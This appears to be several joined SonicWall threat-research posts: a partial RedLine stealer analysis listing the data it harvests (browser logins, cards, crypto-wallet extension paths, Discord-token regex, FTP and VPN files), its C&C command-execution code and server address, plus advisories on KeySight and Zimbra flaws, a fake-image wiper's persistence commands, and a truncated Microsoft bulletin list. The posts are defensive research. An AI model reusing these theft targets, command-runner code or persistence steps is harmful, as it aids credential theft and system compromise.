}

 

  1. лыв7рыва2 (RAM size)

WMI query ‘SELECT TotalVisibleMemorySize FROM Win32_OperatingSystem’ is used to retrieve Random Access Memory (RAM) of the compromised machine. ‘Total of RAM’, ‘Graphic’ and RAM size is assigned to Name, HardType and Counter respectively and added to SystemHardwares list into ScanDetails structure.

 

ScanResult.ScanDetails.SystemHardwares
{
Name: “Total of RAM”
HardType = HardwareType.Graphic
Counter = SystemInfoHelper.TotalOfRAM()
}

 

  1. ылв92р34выа (SoftwaresInfo)

Installed software information is retrieved using registry entry ‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall’. Display name and version info is used to prepare and add value <DisplayName> [<DisplayVersion>] to Softwares list into ScanDetails structure.

 

ScanResult.ScanDetails.Softwares = SystemInfoHelper.ListOfPrograms();

 

  1. аловй (SecurityProductsInfo)

WMI queries for the namespace ‘ROOT\\SecurityCenter2’ or ‘ROOT\\SecurityCenter’ are used to retrieve the installed security products information.

  • SELECT * FROM AntivirusProduct
  • SELECT * FROM AntiSpyWareProduct
  • SELECT * FROM FirewallProduct

 

DisplayName is added to SecurityUtils list into ScanDetails structure.

 

  1. ыал8р45 (ProcessesInfo)

WMI query ‘SELECT * FROM Win32_Process Where SessionId=’Process.GetCurrentProcess().SessionId’’ is used to retrieve processes information. ProcessId, Name and CommandLine is concatenated to ‘ID: <ProcessId>, Name: <Name>, CommandLine: <CommandLine>’ and added to Processes list into ScanDetails structure.

 

ScanResult.ScanDetails.Processes = SystemInfoHelper.ListOfProcesses();

 

  1. ываш9р34 (InstalledLanguagesInfo)

Installed input languages is added to AvailableLanguages list into ScanDetails structure.

 

ScanResult.ScanDetails.AvailableLanguages = SystemInfoHelper.AvailableLanguages();

 

  1. длвап9345 (ScreenCapture)

If the ScanScreen flag is enabled, the screen is captured as a PNG image which is converted into bytes array and stored to Monitor field into ScanResult structure. The screen capture image can be used by threat actor to Identify, if the malware is running under any monitoring tool in a controlled environment.

 

  1. ывал8н34 (TelegramFiles)

If the ScanTelegram flag is enabled, processes are enumerated to find the ‘Telegram.exe’. If Telegram process is found, Telegram installation directory is extracted from executable’s path, else the default path ‘%APPDATA%\Telegram Desktop’ is considered as Telegram installation directory. The malware looks for 16 characters long subdirectories into the Telegram installation directory and adds them into the list of FileScannerArg along with path of ‘<Telegram Installation Directory>\tdata’.

FileScannerArg
{
Directory         :           “One of the scan directories”
Pattern            :           “*”
Recourisive     :           false
Tag                :           “sequence number”
}

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, user profile name, application name, file name and file path and adds to the list of MessageClientFiles in ScanDetails structure.

ScannedFile
{
Body                :           content of the file
DirfOfFile          :           profile directory name
NameOfApplication   :           application name or the directory sequence
NameOfFile          :           file name
PathOfFile          :           null
}

 

  1. вал93тфыв (BrowsersData)

If the ScanBrowsers flag is enabled, directory paths from ScanningArgs.ScanChromeBrowsersPaths and ScanningArgs.ScanGeckoBrowsersPaths are retrieved and enumerated to gets user data storing files. The user data files are decrypted to retrieve and save user data into ScannedBrowser structures and added to the Browsers list into ScanDetails structure.

ScannedBrowser
{
Autofills          :           auto fill entries list
BrowserName :           browser name
BrowserProfile :           browser profile
CC                 :           list of cards (HolderName, Month, Number, Year)
Cookies           :           list of ScannedCookies (Expires, Host, Http, Name, Path, Secure, Value)
Logins             :           list of Accounts (Password, URL, Username)
}

 

  1. вашу0л34 (SensitiveFiles)

If ScanFiles flag is enabled, file paths from ScanFilesPaths list from ScanningArgs are retrieved to get attributes directory to search, patterns, recursive search and maximum file size (optional) separated by “|”.

ScanningArgs.ScanFilesPaths
{
"%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0" string
"%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0"            string
}

Directory Patterns Recursive
%userprofile%\Desktop *.txt,*.doc*,*key*,*wallet*,*seed* 0
%userprofile%\Documents *.txt,*.doc*,*key*,*wallet*,*seed* 0

 

If the directory is “%DSK_32%”, the malware scans though all the logical drives recursively excluding file paths containing below sub paths. Default max file size of scanning any file is 3097152 bytes:

  • ‘\\Windows\\’
  • ‘\\Program Files\\’
  • ‘\\Program Files (x86)\\’
  • ‘\\Program Data\\’

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file and adds to the list of ScannedFiles in ScanDetails structure

ScannedFile
{
Body                :           content of the file
DirfOfFile          :           file directory
NameOfApplication   :           null
NameOfFile          :           file name
PathOfFile          :           file path
}

 

  1. Навева (FileZillaCredentials)

If the ScanFTP flag is enabled, FileZilla files “%APPDATA%\FileZilla\recentservers.xml” and “%APPDATA%\FileZilla\sitemanager.xml” are examined to retrieve URL, port, username and password, and assigned to Account structure and added to FtpConnections into ScanDetails structure.

Account
{
URL            : FTP URL along with the port number
Username       : username
Password       : password
}

 

  1. ащы9р34 (DigitalWallets)

If the ScanWallets is enabled, digital currency wallets path including chromium-based browsers extension paths are added into FileScannerArg along with Patterns and Recoursive flag values.

browserExtensionsRule.SetPaths(settings.ScanChromeBrowsersPaths);
result.ScanDetails.ScannedWallets.AddRange(FileScanner.Scan(
new ArmoryRule(),
new AtomicRule(),
new CoinomiRule(),
new ElectrumRule(),
new EthRule(),
new ExodusRule(),
new GuardaRule(),
new Jx(),
new AllWalletsRule(),
browserExtensionsRule));

 

Directory Pattern Recursive Tag
%APPDATA%\Armory *.wallet false null
%APPDATA%\atomic * true null
%APPDATA%\Coinomi * true null
%APPDATA%\Ethereum\wallets * false null
%APPDATA%\Exodus *.json false null
%APPDATA%\Exodus\exodus.wallet * false null
%APPDATA%\Guarda * true null
%APPDATA%\com.liberty.jaxx * true null

 

Directory Pattern Recursive Tag
<ChromiumBrowsersDataDir>\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb * false <browser_name>_YoroiWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec * false <browser_name>_Tronlink
<ChromiumBrowsersDataDir>\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid * false <browser_name>_NiftyWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn * false <browser_name>_Metamask
<ChromiumBrowsersDataDir>\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc * false <browser_name>_MathWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad * false <browser_name>_Coinbase
<ChromiumBrowsersDataDir>\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp * false <browser_name>_BinanceChain
<ChromiumBrowsersDataDir>\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl * false <browser_name>_BraveWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln * false <browser_name>_GuardaWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac * false <browser_name>_EqualWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne * false <browser_name>_JaxxxLiberty
<ChromiumBrowsersDataDir>\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi * false <browser_name>_BitAppWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj * false <browser_name>_iWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih * false <browser_name>_Wombat
<ChromiumBrowsersDataDir>\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh * false <browser_name>_AtomicWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm * false <browser_name>_MewCx
<ChromiumBrowsersDataDir>\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj * false <browser_name>_GuildWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig * false <browser_name>_SaturnWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec * false <browser_name>_RoninWallet

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path and adds to the list of ScannedFiles into ScanDetails structure.

 

  1. ыва83о4тфыв (DiscordToken)

If the ScanDiscord flag is enabled, directory ‘%appdata%\discord\Local Storage\leveldb’ with Pattern *.log, *.ldb and Recoursive flag as false is added into FileScannerArg.

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path, and adds to the list of GameChatFiles in ScanDetails. The file body is again scanned to match regular expression ‘ [A-Za-z\d]{24}\.[\w-]{6}\.[\w-]{27} to retrieve the discord token which is then replaced the file body to the ScannedFile structure.

ScannedFile
{
Body                            :           matching regular expression pattern in file content
DirfOfFile                    :           file directory
NameOfApplication   :           null
NameOfFile                 :           Tokens.txt
PathOfFile                   :           file path
}

 

  1. askd435

If the ScanSteam flag is enabled, the Steam installation path is retrieved from the registry entry ‘HKEY_CURRENT_USER\SOFTWARE\Valve\Steam’ and added into FileScannerArg along with Pattern and Recousive flag.

Directory Patterns Recursive
<SteamInstalltionPath> *ssfn* 0
<SteamInstalltionPath>\config *.vsdf 0

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path and adds to the list of GameLauncherFiles into ScanDetails structure.

 

  1. sdi845sa (VPNFiles)

If ScanVPN flag is enabled, directory path for OpenVPN and ProtonVPN are added into FileScannerArg. The malware has artifacts that shows, NordVPN files stealing is either being used in other variant or it is planned to be used in upcoming variant.

 

Directory Patterns Recursive
%USERPROFILE%\AppData\Roaming\OpenVPN Connect\profiles *ovpn* 0
%USERPROFILE%\\AppData\\Local\\ProtonVPN *.vsdf 0

 

The scanning of FileScannerArg involves searching for files matching the pattern and collecting file body, file directory, application name, file name and file path for OpenVPN and ProtonVPN and adds to the list Open and Proton into ScanDetails structure.

ScannedFile
{
Body                            :           file content
DirfOfFile                    :           null
NameOfApplication   :           null
NameOfFile                 :           name of file
PathOfFile                   :           file path
}

 

  1. asd44123

Primary screen size (width, height) is retrieved and assigned to Resolution field into ScanResult structure.

 

If the directory ‘%APPDATA%\Yandex\YaAddon’ exists on the compromised machine, it is considered that the malware already run before on the machine and SeenBefore field is set into ScanResult structure. If the directory is not found, SeenBefore field is reset and the directory ‘%APPDATA%\Yandex\YaAddon’ is created.

ScanResult.SeenBefore = SeenBefore();

 

The malware enumerates through the filled structures and replaces empty values with ‘UNKNOWN’.

 

String Obfuscation

Strings are broken into substring and characters to prevent string-based detections and static analysis. The malware also puts some garbage characters into the original string, which are replaced before using the string.

geoInfo.IP = Encoding.UTF8.GetString(new WebClient().DownloadData(new string(new char[21] {
'h', 't', 't', 'p', 's', ':', '/', '/', 'a', 'p',
'i', '.', 'i', 'p', 'i', 'f', 'y', '.', 'o', 'r',
'g'
}))).Replace("\n", "");

 

C&C Communication

RedLine sends the structure containing stolen data from the compromised machine using SOAP API and receives list of tasks containing TaskID, TaskArg, Action and DomainFilter from the C&C server.

 

public class UpdateTask
{
public int TaskID { get; set; }
public string TaskArg { get; set; }
public UpdateAction Action { get; set; }
public string DomainFilter { get; set; }
}

 

The malware has 5 action tasks but for the variant, RunPE task action is not supported.

public enum UpdateAction
{
Download,
RunPE,
DownloadAndEx,
OpenLink,
Cmd
}

Actions Commands

Cmd

Executes the TaskArg value using Command Prompt executable
System.Diagnostics.Process.Start(new ProcessStartInfo("cmd", "/C "+updateTask.TaskArg)
{
UseShellExecu[t]e = false,
CreateNoWindow = true
}).WaitForExit(30000);

Download

Retrieves download URL and file path from the TaskArg field, separated by “|”. File is downloaded from the URL and saved to the file path.

 

DownloadAndEx

Retrieves download URL and file path from the TaskArg field, separated by “|”. File is downloaded from the URL and executes by setting the current working directory to the downloaded file directory.

 

OpenLink

TaskArg is executed as a new process.

 

The malware sends the TaskID from UpdateTask to the C&C server after completing the action task on the compromised machine.

 

Indicators Of Compromise

Follina

20aa70539f31bd9cafba21a89b06857298f64f2cca97869e7cf6532927016877

 

Protection Layers

3354174f028a2682fa83d1b8bce2cf90fa39534f108f9902c2d5ecd644ad8421 (Layer 1)

846e9ae1f5cb837efc5a96ebfff3b846fa48433d19426b869c2bfbe80c90479a (Layer 2)

97024f17003dd3d31dab64c4d1b8251e50d428644eb59ed3692ad79ce42019cf (Layer 3, RunPE)

 

RedLine

4799408b9b05bdf02da7807a3e3e253f35fb2e57cc55e28cb8fe3b181825bb29

 

C&C Server

45.155.165.19:24150

 

References

https://www.proofpoint.com/us/blog/threat-insight/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign

https://github.com/NYAN-x-CAT/CSharp-RunPE

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

 

KeySight RF Sensor Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  KeySight N6854A Geolocation server software and the N6841A RF Sensor software provide an easy way to configure all of the RF Sensors in a network. It provides diagnostic and firmware update tools, along with a color coded health status indicator for each sensor. A user can upload and geo-align maps to show sensor placement and geolocation results via a heat-map overlay, pinpointing the location of unknown RF emitters. Additionally, users can create launchers to quickly start software applications on one or multiple sensors at the same time. The Geolocation server software is tightly integrated with the N6820ES Surveyor 4D software making a spectrum monitoring and emitter location system.

  An SQL injection exists in KeySight N6854A and N6841A RF Sensor. The vulnerability is due to insufficient input validation when restoring databases from arbitrary network locations.

  A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted packets to the target server. Successful exploitation could result in execution of arbitrary code on the target server in the context of SYSTEM.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-38130.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to a lack of authentication controls for accessing the exposed Spring HTTP Invoker endpoints and allowing retrieval of the ZIP file from a remote attacker-controlled server. When a user clicks on the “Tools->Database->Restore Database” button, an HTTP request to the “/server/service/smsConfigServiceHttpInvoker” is sent over localhost on port 8080 to KeysightSMS.exe. This request will invoke the handleRequest() method of the Spring Framework HttpInvokerServiceExporter class, which deserializes a RemoteInvocation object from the serialized data received in the request. An attacker can provide a serialized object that invokes the method smsRestoreDatabaseZip() in Java class WEBINF.classes.com.keysight.tentacle.config.ResourceManager. This method takes as an input the path to the ZIP archive file.

  The code specifically looks for the file tentacle.script in the ZIP archive which after extraction is then passed as an argument in a call when executing MigrateDatabase.bat script. This batch script executes all of the SQL commands present in the given tentacle.script file to update/restore the HSQLDB database which is part of the SMS tool. However, the code does not prevent an attacker from supplying a UNC path and thereby downloading an arbitrary ZIP archive (and tentacle.script file) to be used in restoring the database on the target machine. The attacker can therefore execute arbitrary SQL commands on the target machine with any authentication. Since the SMS tool utilizes HSQLDB and this database allows execution of arbitrary Java static methods, an attacker can craft a malicious tentacle.script file which can, for instance, create files on the target machine at arbitrary locations and with arbitrary data. For instance, executing the following SQL commands, will result in the creation of a short-link file in the directory “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” that opens a calculator on the target machine whenever Windows is restarted:

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends an HTTP request containing a malicious serialized Java object to the target server that downloads the malicious ZIP file from an attacker-controlled server. The vulnerability is triggered when the server processes the downloaded file.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 3323 KeySight N6854A/N6841A Insecure Deserialization 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detecting and filtering malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Zimbra Collaboration Suite TAR Remote Code Execution

Zimbra Collaboration Suite (ZCS) is a collection of tools which include an email server, a chat server, a file sharing server, a shared calendar, and an email client. The application’s web mail client and admin console can be accessed through HTTP. Amavisd runs as a daemon process and listens on TCP port 10024 for incoming SMTP connections. GNU cpio is a tool for creating and extracting archives, or copying files from one place to another. It handles many cpio formats and reading and writing TAR files.

Zimbra TAR Remote Code Execution | CVE-2022-41352
An issue was discovered in ZCS 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. This vulnerability tracked as CVE-2022-41352 (CVSS score 9.8) is a remote code execution flaw that allows attackers to send an email with malicious archive attachment. This attachment bypasses antivirus checks and plants a web shell in the ZCS server.
The root cause of the vulnerability is using the ‘cpio’ file archiving utility to extract archives when Amavisd scans a file for viruses. The cpio component has a flaw that allows an attacker to create archives that can be extracted anywhere on a filesystem accessible to Zimbra.
When an email is sent to a Zimbra server, the Amavis security system will extract the archive to perform a virus scan of its contents. However, if it extracts a specially crafted .cpio, .tar, or .rpm archive, the contents could be extracted to the Zimbra webroot.

In the following exploit the attacker sends an email with subject line ‘News’  that contains malicious attachments news.jpg and news.jpeg

Both the attachments are specially crafted .tar files but are named  .jpg and .jpeg

       

These contain a javascript ResourceVerificaton.jsp file that could deploy web shells to the Zimbra root, effectively giving an attacker shell access to the server.

 

SonicWall Capture Labs provides protection against this threat via following signatures:

  • ASPY 374: Malformed-File tar.OT_1
  • ASPY 379: Malformed-File tar.OT_2
  • GAV CVE-2022-41352.A
  • GAV CVE-2022-41352.A_1

Zimbra has patched this vulnerability.

IoCs
416eba12bc12fe14de62c8a21e2f4c73b017286381a44bc70ef6f73ee6aba8c9
094f2d7d11c612d470d6c8943585b860a42eac7fff974d0a41d5f9cf0906bbd7
c76489fa4cfef22695b9ac66942b3884f52dccf297566482ea48574114613831
b73f4f79e65bb804dae0962ebc5ba6657a4499847bacd4670b3e5ba14e2c7ef2

Fake picture installs a data wiper malware

The Sonicwall Capture Labs Research team came across a malware which purports to be a picture but has the intention to wipe the hard drive thus deleting data and programs. It is a multicomponent infection which starts with a fake image which then drops several files to carry out malicious behaviors.

Infection cycle:

The malware arrives as a picture entitled “SexyPhotos.jpg”.

This is in fact a self-extracting archive that drops the following files:

  • %temp%/avtstart.bat
  • %temp%/del.exe
  • %temp%/windll.exe
  • %temp%/open.exe
  • %temp%/windowss.exe

It ensures persistence by executing avtstart.bat and adding the rest of the files into Startup.

copy dell.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy windowss.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy windll.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy open.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

The other executables that were dropped are all self-extracting archive files that each would drop a bat file and a vbs file to continue the infection.

Each of the files were executed successively as follows:

Windowss.exe drops the following files:

  • windowss.bat
  • windowss.vbs
  • readme.txt (a ransom note)

The vbs file, windowss.vbs, contains a simple command which will use wscript exe (Microsoft Windows script host utility for executing scripts) to execute the batch file, windowss.bat.

This batch file then renames all target files in the victim’s machine as “Locked_!counter!.Locked_fille.”

These files will appear encrypted as if a ransomware had locked the file, but they were simply just renamed as in the screenshot below.

Windll.exe drops the following files:

  • windll.bat
  • windll.vbs
  • readme.txt (a copy of the ransom note)

These files executed similarly with the vbs calling wscript exe to execute the batch file. Windll.bat copies readme.txt into the directories where the locked files are.

Open.exe then drops the following files:

  • open.bat
  • open.vbs
  • open.txt

Again, the open.vbs script runs wscript to execute open.bat. This time the only purpose is to open a URL (that is currently down) and to open the readme.txt which contains instructions on how to unlock the seemingly locked files by paying cryptocurrency worth $300 to a bitcoin address.

However the infection cycle ends here. The original malware then looks for “dell.exe” which is unavailable since the file that was dropped was named “del.exe” with a single –L. If this was not misspelled the infection would have continued. In turn, an error message was shown instead.

Del.exe should have dropped the following files:

  • del.bat
  • del.vbs
  • del.txt

Del.vbs would have executed del.bat using wscript exe and would have wiped the victim’s machine, deleting all data in the drive.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Ransom.FK (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for October 2022

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-37970 Windows DWM Core Library Elevation of Privilege Vulnerability
ASPY 369: Malformed-File exe.MP_275

CVE-2022-37974 Windows Mixed Reality Developer Tools Information Disclosure Vulnerability
ASPY 370: Malformed-File exe.MP_276

CVE-2022-37987 Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability
ASPY 371: Malformed-File exe.MP_277

CVE-2022-37989 Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability
ASPY 377: Malformed-File exe.MP_280

CVE-2022-38050 Win32k Elevation of Privilege Vulnerability
ASPY 372: Malformed-File exe.MP_278

CVE-2022-38051 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 373: Malformed-File exe.MP_279

CVE-2022-38053 Microsoft SharePoint Server Remote Code Execution Vulnerability
IPS 15500: Microsoft SharePoint Remote Code Execution (CVE-2022-38053)

Adobe Coverage:
CVE-2022-28851 Acrobat Reader Out-of-bounds Read
ASPY 376: Malformed-File pdf.MP_560

CVE-2022-38449 Acrobat Reader Out-of-bounds Read
ASPY 375: Malformed-File pdf.MP_559

The following vulnerabilities do not have exploits in the wild :
CVE-2022-22035 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-24504 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30198 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33634 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33635 Windows GDI+ Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-33645 Windows TCP/IP Driver Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-34689 Windows CryptoAPI Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-35770 Windows NTLM Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-35829 Service Fabric Explorer Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-37965 Windows Point-to-Point Tunneling Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37968 Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37971 Microsoft Windows Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37973 Windows Local Session Manager (LSM) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37975 Windows Group Policy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37976 Active Directory Certificate Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37977 Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37978 Windows Active Directory Certificate Services Security Feature Bypass
There are no known exploits in the wild.
CVE-2022-37979 Windows Hyper-V Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37980 Windows DHCP Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37981 Windows Event Logging Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37982 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-37983 Microsoft DWM Core Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37984 Windows WLAN Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37985 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-37986 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37988 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37990 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37991 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37993 Windows Group Policy Preference Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37994 Windows Group Policy Preference Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37995 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37996 Windows Kernel Memory Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-37997 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-37998 Windows Local Session Manager (LSM) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-37999 Windows Group Policy Preference Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38000 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38001 Microsoft Office Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2022-38003 Windows Resilient File System Elevation of Privilege
There are no known exploits in the wild.
CVE-2022-38016 Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38017 StorSimple 8000 Series Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38021 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38022 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38025 Windows Distributed File System (DFS) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38026 Windows DHCP Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38027 Windows Storage Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38028 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38029 Windows ALPC Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38030 Windows USB Serial Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38031 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38032 Windows Portable Device Enumerator Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-38033 Windows Server Remotely Accessible Registry Keys Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38034 Windows Workstation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38036 Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-38037 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38038 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38039 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38040 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38041 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-38042 Active Directory Domain Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38043 Windows Security Support Provider Interface Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38044 Windows CD-ROM File System Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38045 Server Service Remote Protocol Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-38046 Web Account Manager Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-38047 Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38048 Microsoft Office Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-38049 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41031 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41032 NuGet Client Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41033 Windows COM+ Event System Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-41034 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41036 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41037 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41038 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-41042 Visual Studio Code Information Disclosure Vulnerability
